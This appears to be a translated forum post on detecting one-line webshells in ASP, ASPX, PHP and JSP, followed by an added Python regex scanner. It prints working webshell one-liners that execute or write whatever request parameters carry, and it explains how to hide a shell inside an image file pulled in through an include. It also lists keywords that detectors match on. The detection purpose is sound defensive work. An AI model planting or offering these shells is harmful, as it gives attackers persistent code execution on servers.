Principle: a "one-sentence Trojan" (a one-line webshell) is a minimal server-side script that takes whatever the client submits in a request parameter and hands it to the server's interpreter to execute. Because the server parses and runs the submitted data, the payload can do anything the language allows: write to a file of the attacker's choosing, run database queries, and so on.
One-sentence webshell analysis:
The keyword to match on is given in square brackets after each sample. The submitted parameter is 0x001 throughout.
ASP:
<%execute request("0x001")%> [execute]
<%eval request("0x001")%> [eval]
<%eval_r(request("0x001"))%> [eval_r]
<%executeglobal request("0x001")%> [executeglobal]
<%@ Language="JavaScript" CodePage="65001"%><% var obj={'name':Request.Form('0x001'),'sex':eval}; obj.sex(obj.name+''); %> [eval] (the eval function is stored under an innocuous property name and called through it, so "eval(" never appears literally)
<%Set o=Server.CreateObject("ScriptControl"):o.language="VBScript":o.addcode(Request("subcode")):o.run "0x001",Server,Response,Request,Application,Session,Error%> [ScriptControl]
Hiding: write the one-liner into an image file, upload it to the site's images directory, and include it from an ASP page. Image content:
<%On Error Resume Next:If Request("0x001")<>"" Then:Session("webshell")=Request("0x001"):End If:If Session("webshell")<>"" Then:Response.Clear:Execute(Session("webshell")):Response.End:End If%>
Then add this to one of the site's ASP pages: <!--#include file="images/webshell.jpg"-->
Requesting that ASP page with the 0x001 parameter triggers execution. Note that the code is cached in Session("webshell"), so later requests in the same session execute it even when the parameter is absent.
ASPX:
<%@ Page Language="Jscript"%><%eval(Request.Item["0x001"],"unsafe");%> [eval]
<%@ Page Language="Jscript"%><%eval_r(Request.Item["0x001"],"unsafe");%> [eval_r]
<%@ Page Language="C#"%><% if(Request.Files.Count!=0){Request.Files[0].SaveAs(Server.MapPath(Request["0x001"]));} %> [no single distinctive keyword; Request.Files together with SaveAs to a client-chosen path is the signature]
<%@ Page Language="C#" ValidateRequest="false"%><% try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["0x001"].Value))).CreateInstance("c",true,System.Reflection.BindingFlags.Default,null,new object[]{this},null,null);}catch{} %> [System.Reflection.Assembly.Load] // a page that loads an assembly straight from the request body via reflection is not a normal page.
PHP:
<?php @eval($_POST['0x001']);?> [eval]
<?php @eval_r($_POST['0x001']);?> [eval_r]
<?php assert($_POST['0x001']);?> [assert]
<?php echo `$_REQUEST[id]`;?> [``] (the backtick operator runs its contents as a shell command, so no function name appears at all)
PHP can also load code hidden in an image: <?php include('images/webshell.jpg');?>
JSP:
<% if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes()); %> [java.io.FileOutputStream] (writes the contents of parameter t to a file named by parameter f under the web root, i.e. an arbitrary file write rather than direct code execution)
Of course there are many variants and many other functions that can execute code. Full-featured web Trojans do far more than these one-liners and carry many more dangerous keywords. The presence of one of these keywords does not by itself make a page a Trojan, but when analysing a page they are what to look for:
wscript.shell (CLSID: 72c24dd5-d70a-438b-8a42-98108b88afb8)
shell.application (CLSID: 13709620-c279-11ce-a49e-4445535420)
vbscript.encode // used to encode (obfuscate) ASP code
executestatement
shell_exec
xp_unzip shell
scripting.filesystemobject (CLSID: 0d43fe01-f093-11cf-8940-00a0c9054228)
adodb.stream
system.net.sockets
system.diagnostics
system.directoryservices
system.serviceprocess
import="java.util.*,java.io.*"
So regular expressions are the most convenient way to check for the code above when testing. If you have a good detection method, feel free to post it so we can learn from each other.
A WAF can match on the preceding code to perform webshell detection, but it will also report false positives, because some legitimate pages use keywords such as execute (for example, ADO's Command.Execute).
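As an added example (not code from the original post), here is a small Python scanner that applies the keyword-regex approach described above to constructed sample files, then adds the second check a practitioner would want: only flag a file when a dangerous keyword sits close to a request source. The sample file contents, the keyword list and the 200-character proximity window are assumptions of this example, not anything the post specifies.

```python
import re

# Constructed sample files for this example; they are not taken from any real
# site. The shells are the page's one-liners in cleaned-up form, the benign
# pages exist only to show where bare keyword matching over-triggers.
SAMPLES = {
    "asp_execute.asp":  '<%execute request("0x001")%>',
    "asp_eval.asp":     '<%eval request("0x001")%>',
    "asp_jscript.asp":  '<%@ Language="JavaScript" CodePage="65001"%>'
                        '<% var obj={"name":Request.Form("0x001"),"sex":eval}; obj.sex(obj.name+""); %>',
    "aspx_eval.aspx":   '<%@ Page Language="Jscript"%><%eval(Request.Item["0x001"],"unsafe");%>',
    "aspx_upload.aspx": '<%@ Page Language="C#"%><% if(Request.Files.Count!=0)'
                        '{Request.Files[0].SaveAs(Server.MapPath(Request["0x001"]));} %>',
    "php_eval.php":     "<?php @eval($_POST['0x001']);?>",
    "php_assert.php":   "<?php assert($_POST['0x001']);?>",
    "php_backtick.php": "<?php echo `$_REQUEST[id]`;?>",
    "jsp_write.jsp":    '<% if(request.getParameter("f")!=null)(new java.io.FileOutputStream('
                        'application.getRealPath("\\\\")+request.getParameter("f")))'
                        '.write(request.getParameter("t").getBytes()); %>',
    # Legitimate pages: ADO's Command.Execute contains the keyword "execute"
    # but never hands client input to an interpreter.
    "benign_report.asp": '<% Set cmd = Server.CreateObject("ADODB.Command"): '
                         'cmd.CommandText = "SELECT id FROM reports": Set rs = cmd.Execute %>',
    "benign_index.php":  "<?php echo htmlspecialchars($_GET['q']); ?>",
}

# Stage 1: the post's approach, one regex per dangerous keyword (sink).
SINKS = {
    "execute":           r"\bexecute(?:global)?\b",
    "eval":              r"\beval(?:_r)?\b",
    "assert":            r"\bassert\b",
    "scriptcontrol":     r"scriptcontrol",
    "assembly.load":     r"system\.reflection\.assembly\.load",
    "fileoutputstream":  r"java\.io\.fileoutputstream",
    "saveas":            r"\.files\b.*\.saveas\s*\(",
    "backtick":          r"`[^`]*\$_(?:get|post|request|cookie)",
    "shell_exec":        r"\bshell_exec\b",
    "wscript.shell":     r"wscript\.shell",
    "shell.application": r"shell\.application",
    "filesystemobject":  r"scripting\.filesystemobject",
    "adodb.stream":      r"adodb\.stream",
}

# Sources of attacker-controlled data: anything read from the HTTP request,
# covering the ASP, ASP.NET, PHP and JSP spellings used in the samples.
SOURCE = re.compile(
    r"request\s*(?:\(|\.(?:form|item|querystring|cookies|binaryread|files|getparameter))"
    r"|\$_(?:get|post|request|cookie)\b",
    re.IGNORECASE,
)


def keyword_hits(src):
    """Stage 1: names of every dangerous keyword found anywhere in the file."""
    return [name for name, pat in SINKS.items() if re.search(pat, src, re.IGNORECASE)]


def is_suspicious(src, window=200):
    """Stage 2: a sink keyword within `window` characters of a request source.

    This clears pages that merely contain a keyword, but still flags any page
    that feeds request data to such a function, benign or not.
    """
    source_pos = [m.start() for m in SOURCE.finditer(src)]
    if not source_pos:
        return False
    for pat in SINKS.values():
        for m in re.finditer(pat, src, re.IGNORECASE):
            if any(abs(m.start() - p) <= window for p in source_pos):
                return True
    return False


def scan(samples):
    """Return {filename: (keyword_hits, suspicious)} for every sample."""
    return {name: (keyword_hits(src), is_suspicious(src)) for name, src in samples.items()}


if __name__ == "__main__":
    for name, (hits, flagged) in scan(SAMPLES).items():
        print(f"{name:20} keywords={hits!r:24} suspicious={flagged}")
```

Stage 1 flags every shell but also benign_report.asp, which is exactly the false positive the post warns about; stage 2 clears it because no request data reaches the keyword. Neither stage catches a shell that assembles the function name at runtime or reads its payload from somewhere other than the request, so treat hits as triage input for a manual look, not as a verdict.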